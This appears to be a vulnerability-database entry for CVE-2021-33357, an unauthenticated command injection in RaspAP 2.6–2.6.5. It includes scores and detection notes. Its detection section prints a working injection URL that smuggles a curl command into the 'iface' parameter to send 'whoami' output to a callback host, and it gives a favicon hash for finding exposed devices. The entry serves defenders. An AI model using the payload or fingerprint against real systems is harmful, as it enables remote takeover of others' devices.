cbcvebase.
CVE-2021-33357
published 2021-06-09


Priority: P1 (87)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 17.90% (96.8th percentile)
A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.

Affected

1 range
Vendor: raspap
Product: raspap
Version range: 2.6 – 2.6.5
Fixed in: (not listed)

Detection & IOCs (extracted from sources)

path: /ajax/networking/get_netcfg.php
url: {{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;
  • Look for GET requests to /ajax/networking/get_netcfg.php where the 'iface' parameter contains shell metacharacters such as ';'
  • Use Shodan/FOFA favicon hash to identify exposed RaspAP instances: favicon hash -1465760059
  • Exploitation can be confirmed via out-of-band HTTP callback (interactsh/OAST) triggered by the injected curl command with the whoami output in the URL path
  • A response body containing 'DHCPEnabled' confirms the endpoint is reachable and vulnerable
  • The interactsh/OAST request path regex 'GET \/([a-z-]+) HTTP' can be used to extract the whoami output from the callback
  • The vulnerability is unauthenticated: no session or credentials are required to exploit the endpoint
  • Affected versions are strictly RaspAP 2.6 through 2.6.5; versions above 2.6.5 are not affected

CVSS provenance

nvd, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd, v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck: 9.8 CRITICAL